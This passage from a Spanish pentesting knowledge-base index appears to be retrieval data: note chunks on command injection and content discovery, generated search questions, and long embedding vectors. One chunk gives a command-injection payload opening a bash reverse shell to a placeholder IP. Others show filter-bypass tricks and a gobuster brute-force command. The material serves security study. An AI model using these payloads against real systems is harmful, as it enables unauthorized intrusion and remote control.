0.06088, 0.02971, 0.06098, 0.03773, -0.09185, -0.05147, -0.08954, -0.04379, -0.03786, -0.04178, -0.08735, -0.06032, 0.11944, -0.06488, 0.07071, -0.0564, -0.03099, 0.0509, -0.02036, 0.00063, -0.08947, -0.03981, -0.06799, 0.01064, 0.06145, 0.08657, -0.02741, 0.05793, -0.02991, -0.00032, 0.00116, -0.00745, 0.08504, 0.03093, 0.07744, 0.03981, 0.06224, -0.09357, -0.0181, -0.09338, -0.06834, -0.07776, 0.0244, -0.01189, -0.08076, -0.05752, 0.00031, -0.02258, 0.04371, 0.01884, 0.0242, 0.06895, 0.03246, 0.02353, -0.0191, 0.0209, -0.02662, -0.12059, -0.03704, 0.00856, 0.04185, -0.12817, -0.02833, -0.04331, 0.03401, 0.0428, -0.03285, -0.00883, 0.05628, 0.00914, 0.03663, -0.06346, -0.06597, 0.03202, 0.00014, 0.0201, -0.11612, 0.01939, 0.00083, -0.00014, 0.01855, -0.07609, 0.03642, 0.07794, 0.02225, 0.03199, -0.08728, -0.03699, -0.00519, -0.03462, -0.08495, 0.06388, 0.00231, -0.03927, -0.0505, 0.06182, -0.03405, 0.03901, 0.0334, -0.02174, -0.06516, 0.01856, -0.00984, -0.01204, -0.05497, -0.02635, -0.05489, -0.14727, -0.00714, 0.01276, -0.01751, -0.01739, 0.03913, 0.09504, -0.00902, -0.01821, -0.0197, -0.0013, -0.01582, 0.01488, 0.03787, 0.01898, -0.00339, 0.00946, 0.09208, -0.04163, 0.09655, -0.0084, 0.00461, 0.04605, -0.07948, 0.13956, -0.04218, 0.01929, -0.00963, 0.02601, 0.05849, 0.01814, -0.06314, 0.02781, -0.0103, 0.01471, -0.01408, 0.06865, -0.04239, -0.00377, 0.01724, 0.05349, 0.02828, -0.08016, -0.01513, 0.0146, -0.01784, 0.0379, 0.0136, 0.04413, 0.02707, -0.02879, -0.01437, 0.03838, -0.08849, -0.0603, -0.00584, -0.01781, 0.05712, 0.01693, 0.00541, -0.04302, 0.07492, -0.02191, -0.08063, -0.01353, -0.00843, -0.03057, -0.05092, 0.06521, 0.05144, -0.01624, -0.01341, 0.01896]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## De RCE a shell\n```\n?host=127.0.0.1; bash -c 'bash -i >& /dev/tcp/TU_IP/4444 0>&1'\n```\nβ†’ recΓ­bela en tu listener (Reverse shell, ojo al Egress filtering).", "indexar": "cual es una alternativa libre para montar un listener de reverse shell", "v": [0.12174, 0.02357, -0.12279, -0.01777, -0.21389, -0.0098, -0.18648, 0.01215, -0.09951, -0.06606, -0.05756, -0.13534, 0.06989, -0.01431, 0.16005, 0.0057, -0.05897, -0.07394, 0.06957, -0.03222, -0.10177, 0.03629, -0.04194, -0.12238, -0.0223, 0.0641, 0.05972, 0.01449, -0.03899, -0.00129, -0.04216, -0.04507, 0.02028, 0.06147, -0.01263, 0.03986, 0.12364, 0.03266, 0.09146, 0.04787, 0.03331, -0.04452, -0.02596, 0.15586, -0.02166, -0.0436, -0.03035, 0.00698, 0.02776, 0.11553, -0.02346, 0.04835, -0.14565, 0.10424, 0.10397, -0.02242, 0.15535, -0.15325, 0.05337, -0.09498, -0.13572, 0.08777, -0.00046, 0.01392, 0.05982, 0.02578, -0.08288, 0.00521, -0.07383, 0.00508, 0.01844, -0.05012, 0.0592, 0.01097, -0.14918, 0.05843, 0.02213, -0.01182, -0.00325, 0.04465, -0.00365, -0.13218, 0.00153, 0.1297, -0.01209, 0.03741, 0.0934, -0.10986, -0.03673, 0.11871, 0.03977, 0.08788, 0.00209, 0.08082, 0.00388, -0.18148, 0.0084, 0.13863, -0.1218, 0.01233, 0.02149, 0.0336, 0.00228, 0.11741, 0.11306, 0.00774, -0.06817, -0.03033, 1e-05, 0.07442, -0.01133, 0.02985, -0.00689, 0.06964, -0.01166, -0.15329, -0.03542, 0.05607, 0.05153, 0.0153, 0.01996, 0.04117, -0.02967, -0.04965, 0.01913, 0.05258, 0.07277, 0.04849, -0.02851, 0.03267, 0.07324, -0.00111, -0.0063, -0.08513, -0.08542, 0.00057, 0.04056, -0.02686, 0.01267, 0.0809, 0.0219, 0.05254, -0.03561, -0.00295, 0.04026, -0.08333, 0.07403, -0.07705, -0.02638, -0.05749, -0.05198, 0.1116, -0.01174, 0.05383, -0.05569, -0.05881, 0.01557, -0.03326, 0.03482, 0.06485, 0.00755, 0.01159, 0.01903, 0.00237, 0.01144, -0.03656, -0.05946, -0.00132, -0.0082, -0.05591, -0.0372, 0.00754, 0.16219, -0.04959, 0.0494, -0.02237, -0.01826, -0.01965, 0.05911, -0.03863, 0.01985, 0.00463, -0.06183, -0.03371, -0.01409, -0.00548, 0.0306, 0.03261, -0.00711, 0.0345, -0.03608, 0.00558, -0.07296, -0.03807, 0.05345, 0.02489, 0.05369, -0.10143, -0.03987, 0.03826, -0.05247, 0.00329, 0.02713, -0.07342, -0.02204, -0.03724, -0.0623, 0.03312, 0.03643, 0.03518, 0.05357, 0.01023, 0.03029, 0.10965, -0.02342, 0.00909, -0.00681, -0.01501, -0.03015, 0.05895, -0.01901, 0.0326, 0.03889, 0.04032, -0.06219, 0.00281, 0.043, 0.0052, 0.00072, 0.00598, -0.00128, 0.02244, 0.02471, 0.06314, -0.06688, 0.03153, 0.001, 0.02579, 0.0442, 0.00206, 0.05447, 0.07337, 0.00654, -0.01552, 0.01125, 0.00428, -0.02623, 0.00832, -0.04466, -0.02793, -0.03609, 0.03465, -0.01628, -0.00891, 0.02083, -0.03963]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de filtros\n- Espacios filtrados β†’ `${IFS}`, `$IFS$9`, `<`.\n- Palabras filtradas β†’ `w''hoami`, `wh\\oami`, variables.\n\nRelacionado: Directory traversal Β· Reverse shell Β· OSCP MOC", "indexar": "que tecnica sirve para eludir los espacios filtrados en un sistema?", "v": [0.02941, -0.10614, -0.16586, -0.18061, 0.03811, -0.17001, -0.05886, -0.13032, 0.0438, -0.03196, -0.09319, -0.00463, 0.02897, 0.00263, 0.11266, -0.1193, 0.08378, -0.17318, 0.02325, -0.08264, -0.16764, 0.00587, -0.1783, -0.10127, -0.02819, -0.02752, 0.07189, -0.17452, -0.1963, 0.01262, 0.09113, 0.18912, 0.15125, -0.0846, -0.0087, 0.01287, 0.01116, 0.0822, -0.00237, 0.04671, -0.06322, 0.03211, 0.0513, -0.02805, 0.06134, -0.05503, 0.0405, -0.04538, 0.03788, 0.0656, -0.13753, -0.00952, -0.03942, 0.00292, -0.03152, -0.16571, 0.04114, -0.06125, -0.00377, -0.03269, -0.05203, 0.01485, 0.12086, -0.00139, -0.00938, -0.06294, -0.0037, -0.02997, 0.02026, 0.04674, 0.01461, 0.00011, 0.12142, -0.01649, -0.1057, 0.04672, 0.02419, 0.02332, 0.028, -0.04496, -0.02443, 0.05626, -0.1573, -0.04144, 0.00707, -0.02666, -0.01537, -0.01687, -0.0719, -0.10028, -0.02103, -0.0282, 0.11577, 0.01005, 0.07998, 0.00373, -0.01795, 0.04229, -0.03771, -0.02118, 0.07471, -0.08091, -0.12505, 0.02258, -0.02073, 0.03663, 0.07034, -0.10517, -0.02763, -0.10525, -0.05449, 0.09557, -0.03762, -0.02206, -0.0622, 0.01971, 0.02386, -0.04177, -0.02742, 0.01544, -0.05055, 0.04325, -0.06952, -0.07285, 0.06447, 0.01407, 0.02684, -0.01887, 0.08274, 0.03915, 0.01998, 0.01584, -0.05598, 0.09155, -0.02065, -0.09497, 0.02617, 0.02164, -0.08776, -0.00601, 0.00274, 0.14478, -0.06128, -0.05202, -0.01946, -0.00026, 0.10204, -0.10423, -0.00725, -0.0779, -0.03505, 0.01116, -0.01947, -0.00073, -0.0198, -0.02196, -0.00709, -0.03001, -0.05974, -0.05034, 0.00208, 0.05471, 0.00094, -0.00142, 0.0133, 0.04558, -0.03159, -0.09799, 0.02898, 0.0451, 0.01283, -0.00556, 0.00742, -0.01366, -0.01407, 0.01735, 0.02151, -0.04793, -0.01947, 0.0412, -0.0377, 0.00599, 0.01963, 0.00801, 0.04069, 0.00036, -0.07045, 0.00038, -0.00249, 0.02324, 0.02541, 0.03764, -0.0561, 0.00619, -0.04022, -0.02127, -0.0404, -0.0572, 0.03127, -0.00882, -0.01384, 0.09894, 0.07188, 0.00334, 0.01781, 0.05413, 0.08933, -0.03551, 0.01701, 0.04399, -0.03259, 0.01375, 0.00062, -0.00926, -0.08707, 0.07501, 0.05646, 0.01188, 0.06375, -0.00509, 0.04588, -0.06092, -0.02467, -0.03439, 0.0023, -0.01018, -0.02751, 0.01555, -0.01949, -0.02441, 0.01509, -0.07654, 0.00454, 0.01367, -0.01614, -0.0036, 0.00516, 0.00944, -0.01979, -0.11802, 0.03775, 0.02802, 0.01995, 0.00217, 0.04563, 0.00667, -0.08009, -0.05684, 0.03363, -0.05831, 0.02442, -0.01056, -0.01297, -0.00929, 0.02554, 0.02903]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de filtros\n- Espacios filtrados β†’ `${IFS}`, `$IFS$9`, `<`.\n- Palabras filtradas β†’ `w''hoami`, `wh\\oami`, variables.\n\nRelacionado: Directory traversal Β· Reverse shell Β· OSCP MOC", "indexar": "como puedo usar variables para desactivar la detecciΓ³n de palabras filtradas?", "v": [0.24863, 0.02073, -0.17695, -0.16625, -0.04146, 0.01001, -0.05831, -0.10593, 0.01017, -0.05533, 0.04323, -0.17037, -0.08929, -0.08263, 0.0213, 0.02098, 0.06955, -0.12789, 0.01165, -0.08851, 0.00032, -0.20055, -0.1057, -0.10443, -0.06108, 0.13409, -0.06304, 0.01449, -0.1001, -0.09272, -0.01073, 0.03409, 0.14071, -0.00834, -0.12276, 0.10008, -0.08025, 0.0062, 0.15606, 0.08534, 0.02524, 0.00533, -0.03587, 0.03548, 0.00213, 0.01435, -0.12437, -0.0208, -0.02487, 0.00648, 0.00435, -0.03242, -0.07701, -0.03259, -0.05083, -0.03002, 0.08328, -0.03447, -0.08259, -0.10189, -0.0594, 0.00404, 0.08786, 0.07985, 0.02305, -0.05658, 0.09145, 0.03477, -0.02685, 0.11546, 0.0422, -0.00997, 0.0173, 0.03414, 0.11245, 0.06668, 0.05568, -0.06572, 0.06934, 0.02618, -0.08935, -0.03804, 0.01872, 0.02864, -0.03988, -0.03681, 0.05607, -0.08545, 0.00713, -0.1125, -0.10651, 0.00116, 0.00033, 0.0106, -0.05886, -0.00891, 0.00016, 0.08083, -0.02006, 0.04675, 0.10227, -0.09893, 0.0136, 0.13142, 0.04484, -0.05432, 0.07869, 0.03399, -0.04775, -0.13817, 0.08622, -0.01606, -0.04668, -0.1743, 0.00173, 0.01573, 0.05578, -0.02978, -0.03316, -0.04254, -0.02439, -0.07027, -0.03788, -0.05957, 0.0597, 0.01668, -0.03487, -0.00762, -0.04761, 0.04268, -0.03937, 0.12326, -0.04263, -0.06082, -0.06846, 1e-05, 0.0078, -0.05553, -0.05238, -0.06899, -0.04976, -0.00913, 0.00348, 0.03669, 0.10067, -0.02283, -0.03477, -0.00342, -0.06442, -0.01397, 0.10693, -0.07823, -0.01844, 0.03398, -0.07077, 0.00014, 0.07624, 0.01047, -0.03555, -0.05366, -0.00183, -0.04779, -0.02356, 0.03575, 0.0926, -0.01343, 0.04526, -0.02889, 0.05603, 0.01598, 0.02275, -0.0182, 0.05724, -0.06629, -0.02734, 0.04537, -0.01143, -0.01895, -0.05541, -0.08056, -0.00699, 0.05369, -0.09119, -0.09196, 0.04233, 0.03968, 0.01978, -0.03243, -0.01998, -0.04157, -0.0356, -0.0301, -0.00366, -0.01957, 0.03295, -0.01332, 0.03527, 0.01498, 0.0564, -0.07814, 0.01469, -0.01538, 0.01914, -0.05536, 0.04526, 0.06225, -0.03308, -0.02677, 0.02747, -0.05068, 0.0384, -0.00672, -0.00485, 0.01159, -0.05387, -0.00324, -0.05508, 0.05043, 0.07201, -0.0002, 0.00467, 0.02371, 0.0141, 0.06625, -0.01991, -0.03878, -0.06664, -0.00872, 0.1208, 0.00425, 0.00259, 0.01413, -0.01245, 0.00652, -0.03984, -0.04241, -0.05922, -0.00692, 0.04362, -0.01626, 0.02076, 0.01863, -0.01664, -0.04995, 0.00717, -0.01332, -0.05971, -0.00264, -0.04126, -0.00201, -0.06116, -0.03328, 0.01888, -0.04571, 0.04138, -0.00808]} +{"tipo": "pregunta", "herramienta": "Command injection", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Command injection.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Bypass de filtros\n- Espacios filtrados β†’ `${IFS}`, `$IFS$9`, `<`.\n- Palabras filtradas β†’ `w''hoami`, `wh\\oami`, variables.\n\nRelacionado: Directory traversal Β· Reverse shell Β· OSCP MOC", "indexar": "cual es una alternativa libre al bypass de filtros mencionada?", "v": [0.2183, 0.20118, -0.0235, 0.06869, 0.04421, -0.01916, 0.00154, -0.1591, -0.20191, -0.03612, 0.06463, -0.10533, -0.03594, 0.08902, 0.12006, -0.09204, 0.00349, -0.05168, 0.0999, -0.01873, -0.04647, -0.04871, -0.0946, -0.03423, -0.06132, -0.09905, -0.01071, -0.03253, -0.1246, -0.01069, 0.11516, 0.00981, 0.04044, -0.02021, 0.00241, 0.04424, 0.07361, 0.05982, 0.05661, -0.04177, 0.05975, -0.02785, -0.07519, 0.08328, -0.02064, -0.15579, -0.0867, 0.06735, -0.0432, -0.00025, 0.02328, -0.02333, -0.10184, 0.102, 0.08935, -0.07811, 0.11866, -0.07936, -0.02129, 0.04348, -0.05045, 0.07289, 0.06866, -0.03041, 0.01094, -0.06455, -0.03274, -0.05814, -0.06952, 0.0856, 0.04599, -0.03822, 0.08681, -0.05827, -0.07313, 0.0536, -0.03639, 0.0586, 0.0753, 0.06279, 0.04276, -0.13355, -0.00395, 0.02599, -0.04326, -0.0982, 0.04689, -0.03083, -0.03373, 0.03828, 0.03415, 0.02702, 0.02932, 0.11828, 0.03494, -0.05521, 0.04018, 0.15634, 0.00747, 0.02946, 0.17775, 0.05885, -0.0722, 0.09582, 0.02701, -0.06292, -0.04614, -0.05044, -0.01111, -0.01781, -0.00911, 0.03091, -0.04079, -0.08464, 0.08449, 0.0298, -0.03319, -0.07761, -0.0069, 0.00586, -0.05807, 0.00544, -0.05319, -0.11166, 0.08312, 0.04054, 0.01229, 0.06558, -0.02256, 0.01641, 0.02841, 0.08362, -0.06504, -0.131, -0.1247, -0.03317, 0.02851, -0.00273, 0.04707, -0.0212, 0.02927, 0.04328, 0.01234, 0.00081, 0.02975, 0.00059, -0.01407, -0.04186, -0.02656, -0.01931, -0.02883, -0.00473, 0.03601, 0.14303, -0.06582, 0.05744, 0.05625, -0.03255, -0.07363, 0.11482, -0.01954, 0.05864, -0.06273, 0.04501, 0.02163, 0.00684, 0.00553, -0.05593, -0.06649, -0.07454, -0.02021, 0.01715, 0.0317, -0.07676, -0.00077, -0.08299, 0.01189, -0.0492, 0.07422, -0.03545, 0.00153, 0.06442, -0.14026, -0.07335, -0.03755, -0.04498, -0.03208, 0.01681, 0.03107, 0.06396, -0.04186, -0.01677, -0.06048, -0.03221, -0.03957, -0.05604, 0.00027, -0.05364, 0.00343, -0.03073, -0.03008, -0.02312, -0.03653, -0.03465, -0.02551, -0.02507, -0.01409, 0.03519, -0.02075, 0.06252, 0.04906, -0.02737, 0.04744, -0.04112, -0.00613, 0.05518, 0.08408, 0.01189, 0.03181, 0.03994, 0.07474, 0.03036, 0.07978, 0.05028, 0.0086, 0.04722, 0.03518, 0.03484, -0.01836, 0.02534, -0.02369, -0.00752, -0.05972, -0.0184, 0.03939, 0.02466, -0.01083, 0.01598, -0.07286, -0.0052, 0.08938, 0.04016, -0.06579, -0.03794, -0.01213, -0.01502, -0.07982, -0.03183, -0.03078, -0.05771, -0.01207, 0.05176, -0.0222, -0.04706, 0.0613, -0.00467]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Content discovery\n\n> Descubrir rutas, ficheros y endpoints ocultos por fuerza bruta. El paso que mΓ‘s vectores destapa en Hacking web. Complementa EnumeraciΓ³n web.", "indexar": "que herramienta sirve para descubrir rutas y archivos ocultos", "v": [0.21676, -0.10073, -0.21804, -0.17489, 0.07459, -0.13756, -0.0873, 0.0079, 0.10095, -0.10181, -0.06396, -0.18304, 0.07763, 0.03161, 0.05064, -0.00362, 0.08835, -0.02206, 0.01684, -0.01636, -0.03049, -0.02025, -0.06405, -0.01052, -0.09598, -0.08534, 0.10613, 0.03909, -0.09195, 0.02625, -0.02274, 0.13343, 0.03484, -0.06528, -0.12148, -0.02856, 0.01627, -0.00595, -0.04966, -0.00822, 0.02783, 0.05109, -0.04931, 0.15406, 0.02301, -0.02155, -0.08755, -0.01054, -0.01499, 0.09555, -0.03914, -0.21341, -0.13777, 0.00613, 0.03467, -0.11658, 0.02179, -0.08192, 0.00216, -0.04797, -0.03926, 0.02733, -0.04372, -0.0343, -0.00498, -0.07421, -0.01755, 0.01773, -0.10563, 0.05611, 0.00752, 0.07632, 0.1634, 0.04069, -0.08041, -0.0364, 0.04897, 0.01306, 0.01641, 0.02092, 0.12816, 0.05035, -0.06253, 0.01878, -0.04202, -0.08593, 0.07801, 0.04142, -0.03068, -0.06592, -0.04167, 0.08721, -0.04952, 0.03823, -0.00437, 0.02371, 0.11452, -0.06314, 0.00016, -0.01074, 0.06686, -0.06236, -0.08938, 0.09667, -0.02946, 0.0843, -0.06717, -0.01138, -0.06859, 0.02997, 0.1293, 0.0469, 0.02676, 0.04456, -0.00892, 0.10525, 0.04056, -0.0488, -0.02234, -0.06959, -0.00597, 0.04754, -0.12432, 0.0218, 0.01885, -0.04769, -0.06591, 0.07874, 0.01109, -0.05088, 0.04017, -0.03342, -0.11344, 0.0508, -0.0924, -0.04059, 0.06512, -0.00756, -0.047, -0.05919, 0.08833, -0.02759, -0.09062, -0.05917, 0.06551, 0.05084, 0.03769, -0.0233, 0.03335, -0.07036, -0.03717, -0.0617, 0.03213, 0.01585, 0.03737, 0.0397, -0.01535, -0.0646, -0.12791, 0.03612, -0.04445, -0.00215, -0.05027, -0.0233, 0.00785, -0.1098, 0.03747, -0.01968, 0.06842, -0.03718, 0.07345, -0.0012, 0.07415, -0.04879, -0.04478, -0.01513, -0.04431, -0.03548, 0.07305, -0.0241, -0.01988, -0.00012, -0.0027, 0.01113, -0.00557, -0.04208, 0.10188, -0.10195, -0.04951, 0.02595, 0.00189, -0.03963, -0.00168, -0.04021, -0.03263, -0.01823, 0.03526, 0.01677, 0.04339, -0.02796, 0.01447, 0.00896, -0.04252, 0.00534, 0.00873, 0.0005, -0.02512, -0.01885, 0.03941, 0.01563, 0.04528, -0.03315, 0.03484, -0.06205, 0.0442, -0.02912, -0.05973, 0.01464, -0.02339, 0.01533, 0.02845, -0.00145, 0.03611, -0.00927, 0.04714, 0.04714, -0.02635, -0.01565, -0.03079, -0.04434, 0.02551, -0.03186, -0.06252, 0.05822, 0.01304, -0.06862, 0.01795, 0.00087, -0.04699, 0.00166, -0.01087, 0.04615, 0.07244, -0.01978, -0.04472, -0.04889, 0.04396, -0.01732, 0.00721, -0.03977, -0.03447, 0.04557, 0.06168, 0.02412, 0.03397, -0.04206]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# Content discovery\n\n> Descubrir rutas, ficheros y endpoints ocultos por fuerza bruta. El paso que mΓ‘s vectores destapa en Hacking web. Complementa EnumeraciΓ³n web.", "indexar": "cual programa ayuda a encontrar endpoints secretos de una pagina web", "v": [0.09591, 0.05482, -0.10161, -0.12489, 0.12285, -0.15378, -0.06435, -0.16017, -0.0806, -0.03533, -0.09789, -0.10788, -0.09308, -0.11347, 0.01409, -0.02992, 0.10497, -0.05928, 0.16375, 0.01273, 0.02379, -0.02148, -0.13145, -0.04553, -0.0754, -0.04491, 0.10092, 0.08653, -0.01975, 0.02732, -0.00712, -0.03129, -0.04448, 0.01219, -0.06846, 0.09271, 0.15, 0.07605, -0.03075, 0.01037, -0.02407, -0.12326, 0.03732, -0.02659, 0.05491, 0.01734, 0.00578, 0.02497, 0.03386, -0.0287, -0.0364, -0.07758, -0.15821, -0.08848, 0.02631, -0.12456, 0.15882, -0.08539, -0.05121, -0.00396, -0.05902, -0.0556, -0.02747, -0.01775, 0.04469, -0.05032, 0.06136, 0.0164, -0.00574, 0.00271, -0.04795, 0.0515, 0.0831, -0.07725, 0.01289, 0.00947, 0.01017, -0.01963, 0.00962, -0.05694, -0.00055, 0.04989, -0.02733, 0.07991, -0.10445, -0.12051, 0.00289, 0.03703, -0.0187, -0.18705, 0.04383, 0.04079, -0.06179, 0.05422, -0.01264, -0.04203, 0.10131, 0.0122, 0.03906, -0.03129, 0.01029, -0.06617, -0.16296, 0.09459, 0.03805, 0.07048, 0.02679, 0.01622, -0.11417, 0.10144, 0.04335, 0.01226, 0.00686, -0.0439, -0.02075, -0.02113, 0.03611, 0.07842, 0.05154, -0.18889, -0.16759, 0.03917, -0.06098, 0.07487, 0.06486, 0.04475, 0.02087, 0.06218, 0.02863, 0.01106, 0.00105, -0.021, -0.00498, 0.00704, 0.02246, -0.04254, 0.01497, -0.00672, -0.01331, -0.02349, 0.07933, -0.12197, -0.04864, -0.02006, 0.06627, -0.1148, 0.05332, -0.01657, -0.05228, 0.00222, 0.03093, 0.06078, 0.01394, 0.01947, -0.03263, -0.03234, -0.03095, -0.00086, -0.04701, 0.02219, -0.02049, 0.10373, -0.00498, -0.06956, 0.04057, -0.03321, -0.07938, 0.07713, -0.009, 0.04096, -0.01763, 0.0446, 0.01529, -0.10974, -0.02497, -0.02095, -0.00601, -0.05577, 0.09039, -0.00941, -0.06708, 0.05378, 0.08165, 0.01906, -0.05418, -0.02675, 0.01172, -0.00475, 0.00886, 0.03736, -0.01937, -0.04038, -0.06572, 0.00885, -0.0177, 0.00949, -0.04323, -0.00967, 0.10457, -0.11818, -0.02679, 0.00127, -0.03718, -0.03821, -0.01218, 0.07503, -0.02668, -0.05672, 0.02547, 0.02767, 0.03028, -0.05174, -0.01293, -0.02711, -0.04106, -0.07868, -0.00292, -0.02155, -0.04095, 0.0567, 0.01998, -0.03364, 0.00675, -0.00135, 0.0756, -0.06607, 0.09068, 0.02396, 0.00584, 0.09342, -0.05297, -0.04279, -8e-05, -0.04632, 0.08551, -0.04185, -0.00752, 0.01977, 0.01696, -0.03814, -0.01836, 0.06676, 0.03756, -0.06519, 0.03693, -0.05163, -0.06565, 0.00186, 0.02228, -0.03046, -0.05402, 0.02909, 0.02145, -0.0491, 0.05062, -0.02833]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# gobuster (rΓ‘pido, directo)\ngobuster dir -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,txt,html", "indexar": "quΓ© programa puedo usar para explorar los directorios de una web rΓ‘pidamente?", "v": [-0.0167, 0.10687, -0.2025, -0.07996, 0.01434, -0.0259, -0.00874, -0.06865, -0.066, -0.11554, -0.08638, -0.08263, -0.11677, -0.14928, -0.08107, -0.06091, 0.15237, -0.04717, 0.06074, -0.03515, 0.01847, 0.00402, -0.13588, -0.01069, -0.07706, 0.00349, -0.00312, -0.0685, -0.06468, 0.02003, -0.05273, 0.08622, 0.07791, -0.08317, -0.09955, -0.00815, 0.08712, -0.01386, 0.02629, 0.05642, 0.05268, 0.00535, -0.14385, 0.05619, 0.03781, -0.02924, 0.03387, -0.11999, -0.05243, -0.04663, 0.0453, -0.00638, -0.09298, 0.01425, 0.12108, -0.06315, 0.07167, -0.1541, 0.00608, 0.04716, -0.0444, -0.03021, -0.01551, 0.01047, -0.02502, -0.12094, 0.04659, -0.00044, -0.14385, 0.05323, -0.06223, 0.04422, 0.0949, 0.07844, 0.00991, 0.11308, -0.0533, -0.05382, 0.09174, -0.04251, 0.0054, 0.01342, 0.04525, 0.03126, -0.18568, -0.10579, 0.05828, -0.05208, 0.01893, -0.13529, 0.04489, 0.05769, -0.09581, 0.02409, 0.06276, -0.0896, 0.08909, 0.05103, 0.05873, 0.06356, 0.02159, -0.06762, -0.12859, 0.17591, -0.01327, 0.08603, 0.07166, 0.03221, -0.1325, 0.03058, 0.00194, -0.03564, -0.13097, -0.11046, -0.07241, 0.03464, -0.08138, -0.04522, 0.03148, -0.12708, -0.10731, 0.05717, -0.02732, 0.03681, 0.08871, -0.03087, 0.00994, 0.11651, -0.04309, 0.01943, 0.00937, -0.03732, -0.09122, -0.0263, -0.02206, -0.00649, 0.02494, -0.02225, 0.0605, -0.03715, 0.0229, -0.00165, -0.03449, 0.02317, 0.0535, -0.02936, -0.01138, -0.0227, -0.06193, 0.03404, 0.00747, -0.01156, 0.00522, 0.01999, -0.01646, -0.04747, 0.08812, -0.01855, -0.08744, 0.00698, -0.01305, 0.00801, -0.01744, 0.02442, 0.04431, -0.08045, -0.01843, 0.01023, 0.03851, 0.04936, 0.01404, 0.13477, 0.03287, -0.1067, 0.0094, -0.00416, -0.02531, -0.07194, 0.01667, -0.03086, -0.07083, 0.03303, 0.00922, 0.001, -0.06866, -0.03628, 0.01169, 0.02661, -0.03677, 0.03689, 0.00184, 0.05754, 0.01965, 0.01961, 0.00193, -0.01605, 0.00693, 0.00591, 0.01145, -0.09597, -0.06853, 0.00256, -0.01494, -0.05449, 0.03444, 0.04301, -0.05111, 0.01138, 0.006, 0.0409, 0.0207, -0.03975, 0.1162, -0.00859, -0.04494, 0.03524, 0.01564, 0.03477, 0.01219, 0.01498, 0.00019, 0.0234, 0.01428, 0.06068, 0.02927, -0.04713, 0.01805, -0.01425, 0.00612, 0.03876, -0.0096, -0.04172, -0.01821, -0.03896, 0.06442, 0.00398, 0.00967, -0.01122, -0.04545, -0.00065, -0.02972, 0.13721, -0.01596, -0.00456, -0.02582, -0.03664, -0.10174, 0.03288, -0.0329, -0.03412, -0.07619, 0.03396, 0.03506, -0.062, 0.00033, 0.05295]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# gobuster (rΓ‘pido, directo)\ngobuster dir -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,txt,html", "indexar": "con quΓ© herramienta puedo escanear un sitio web buscando archivos ocultos sin configurar mucho?", "v": [0.08034, 0.03946, -0.2231, -0.12186, -0.01234, -0.1852, -0.07696, -0.06906, -0.03994, -0.0653, -0.148, -0.07965, -0.00894, -0.07529, 0.05571, 0.03675, 0.17102, -0.07925, 0.09831, 0.04738, -0.0582, -0.03129, -0.0189, -0.01521, -0.0718, -0.13782, 0.03335, 0.04074, -0.1507, -0.00917, -0.02848, 0.1396, 0.07473, 0.08871, -0.10951, 0.02708, 0.05271, 0.00175, -0.00269, -0.04238, -0.05436, 0.0033, -0.08476, 0.102, -0.018, -0.02101, -0.06384, 0.00775, 0.0145, 0.02539, -0.04518, -0.17606, -0.16888, 0.0458, 0.03345, -0.09972, 0.1893, -0.15506, 0.1441, -0.10633, -0.06403, 0.08198, 0.01379, 0.01141, -0.04817, 0.06936, -0.00877, 0.07648, -0.08102, 0.03774, 0.0329, 0.05245, 0.07485, -0.02493, 0.11158, 0.00562, 0.05508, -0.0049, 0.03706, 0.05706, 0.07656, 0.01194, -0.09076, 0.04819, -0.1409, -0.07018, -0.02496, 0.00882, -0.02745, -0.10584, 0.05111, 0.01858, -0.05736, -0.00704, -0.01223, -0.05739, 0.12544, -0.04095, -0.0275, -0.03615, 0.03995, -0.01027, -0.14463, 0.11651, 0.05876, 0.09074, -0.02205, -0.0132, -0.03133, -0.02222, 0.10072, 0.03938, -0.04441, 0.03779, -0.04659, 0.07903, 0.02831, -0.01932, 0.01411, -0.08079, 0.0077, 0.04526, -0.08958, 0.00778, 0.00591, 0.00948, 0.0255, 0.07756, -0.02828, -0.01473, 0.01284, -0.11577, -0.06192, 0.01776, -0.08433, -0.00498, 0.03366, -0.03495, -0.01891, -0.05146, 0.0614, -0.09136, -0.06364, -0.03519, 0.07666, -0.01463, 0.04227, -0.04096, -0.06241, -0.10518, -0.05854, -0.01206, 0.01802, 0.00334, -0.04342, 0.07522, -0.01944, -0.03069, -0.09306, -0.01041, -0.08478, 0.03295, 0.00794, -0.00974, -0.01169, -0.01478, -0.01583, 0.01677, 0.02426, 0.02695, 0.0474, 0.03561, 0.01742, -0.11491, 0.0087, 0.03883, -0.0043, -0.03922, 0.08295, -0.05269, -0.00047, -0.00029, 0.01498, 0.03246, 0.00452, -0.02622, 0.08339, -0.07516, -0.07159, 0.05107, 0.04754, -0.01783, -0.05175, -0.04192, 0.02, -0.00205, -0.01682, -0.01021, 0.03431, -0.05348, -0.02546, -0.02957, -0.00263, -0.03085, -0.00275, 0.00471, -0.01581, -0.07378, 0.01589, 0.00085, 0.02291, -0.06714, 0.0366, -0.09489, 0.02048, -0.026, 0.02409, 0.00571, -0.04059, 